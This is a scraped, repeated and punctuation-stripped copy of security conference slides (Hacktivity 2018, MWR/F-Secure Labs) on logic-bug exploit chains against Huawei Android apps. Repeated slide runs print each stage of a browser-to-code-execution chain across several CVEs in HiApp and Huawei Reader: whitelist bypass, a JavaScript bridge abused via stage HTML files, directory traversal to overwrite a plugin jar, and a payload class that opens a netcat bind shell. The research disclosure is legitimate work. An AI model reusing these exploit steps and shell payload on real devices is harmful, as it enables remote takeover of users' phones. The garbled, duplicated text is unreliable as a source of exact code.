documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 10: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 11: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 12: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

